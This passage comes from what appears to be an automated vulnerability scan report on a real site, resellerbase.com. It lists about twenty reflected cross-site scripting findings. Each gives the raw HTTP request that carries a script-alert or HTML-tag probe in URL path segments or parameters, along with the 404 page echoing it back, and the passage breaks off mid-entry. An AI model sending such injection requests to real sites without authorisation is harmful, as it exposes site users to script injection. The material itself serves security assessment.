...[SNIP]...

2.3542. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3d0a<script>alert(1)</script>ec40cc0fc8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6b3d0a<script>alert(1)</script>ec40cc0fc8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6b3d0a<script>alert(1)</script>ec40cc0fc8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3543. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fadd4<script>alert(1)</script>50bd42c03b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesfadd4<script>alert(1)</script>50bd42c03b7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesfadd4<script>alert(1)</script>50bd42c03b7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3544. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 27818<script>alert(1)</script>45edd60568b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/search.php27818<script>alert(1)</script>45edd60568b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php27818<script>alert(1)</script>45edd60568b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3545. http://www.resellerbase.com/detail/6/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 42bbf<a>21abd74aab1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search42bbf<a>21abd74aab1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search42bbf<a>21abd74aab1&opt=2 was not found on this server.</p>
...[SNIP]...

2.3546. http://www.resellerbase.com/detail/6/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 126fa<a>625673d7ac2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...126fa<a>625673d7ac2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...126fa<a>625673d7ac2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3547. http://www.resellerbase.com/detail/6/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45442<script>alert(1)</script>9c6f1b5a3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2&45442<script>alert(1)</script>9c6f1b5a3c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2&45442<script>alert(1)</script>9c6f1b5a3c2=1 was not found on this server.</p>
...[SNIP]...

2.3548. http://www.resellerbase.com/detail/6/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c1bb1<a>39a9d2c4f02 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2c1bb1<a>39a9d2c4f02 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2c1bb1<a>39a9d2c4f02 was not found on this server.</p>
...[SNIP]...

2.3549. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b007c<script>alert(1)</script>ac43bd0e4fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb007c<script>alert(1)</script>ac43bd0e4fa/6/whitelabeldropshipper-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb007c<script>alert(1)</script>ac43bd0e4fa/6/whitelabeldropshipper-com.html was not found on this server.</p>
...[SNIP]...

2.3550. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 100a9<a>9e72415947f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6100a9<a>9e72415947f/whitelabeldropshipper-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6100a9<a>9e72415947f/whitelabeldropshipper-com.html was not found on this server.</p>
...[SNIP]...

2.3551. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d861e<script>alert(1)</script>c9644de2d6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/d861e<script>alert(1)</script>c9644de2d6f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/d861e<script>alert(1)</script>c9644de2d6f was not found on this server.</p>
...[SNIP]...

2.3552. http://www.resellerbase.com/detail/7/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6681c<script>alert(1)</script>15208faa8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6681c<script>alert(1)</script>15208faa8b5/7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6681c<script>alert(1)</script>15208faa8b5/7/ was not found on this server.</p>
...[SNIP]...

2.3553. http://www.resellerbase.com/detail/7/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f05ff<script>alert(1)</script>fc20ed9a0bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7f05ff<script>alert(1)</script>fc20ed9a0bc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7f05ff<script>alert(1)</script>fc20ed9a0bc/ was not found on this server.</p>
...[SNIP]...

2.3554. http://www.resellerbase.com/detail/7/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9009b<script>alert(1)</script>c10e4e4edad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/?9009b<script>alert(1)</script>c10e4e4edad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/?9009b<script>alert(1)</script>c10e4e4edad=1 was not found on this server.</p>
...[SNIP]...

2.3555. http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/proxyonline-info-website-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b77c<script>alert(1)</script>5bf95d27dc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9b77c<script>alert(1)</script>5bf95d27dc5/7/proxyonline-info-website-monitoring.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9b77c<script>alert(1)</script>5bf95d27dc5/7/proxyonline-info-website-monitoring.html was not found on this server.</p>
...[SNIP]...

2.3556. http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/proxyonline-info-website-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79aef<script>alert(1)</script>73455682fa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/79aef<script>alert(1)</script>73455682fa8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/79aef<script>alert(1)</script>73455682fa8 was not found on this server.</p>
...[SNIP]...

2.3557. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 552f6<script>alert(1)</script>85c0423554b4ad4fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail552f6<script>alert(1)</script>85c0423554b4ad4fb/7/rating.php?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail552f6<script>alert(1)</script>85c0423554b4ad4fb/7/rating.php?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3558. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52e89<script>alert(1)</script>a907bbc4541 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52e89<script>alert(1)</script>a907bbc4541/7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52e89<script>alert(1)</script>a907bbc4541/7/rating.php was not found on this server.</p>
...[SNIP]...

2.3559. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16cda<script>alert(1)</script>fd0ebe62beaffd2fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/716cda<script>alert(1)</script>fd0ebe62beaffd2fa/rating.php?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/716cda<script>alert(1)</script>fd0ebe62beaffd2fa/rating.php?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3560. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6356d<script>alert(1)</script>546a488a8aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/76356d<script>alert(1)</script>546a488a8aa/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/76356d<script>alert(1)</script>546a488a8aa/rating.php was not found on this server.</p>
...[SNIP]...

2.3561. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
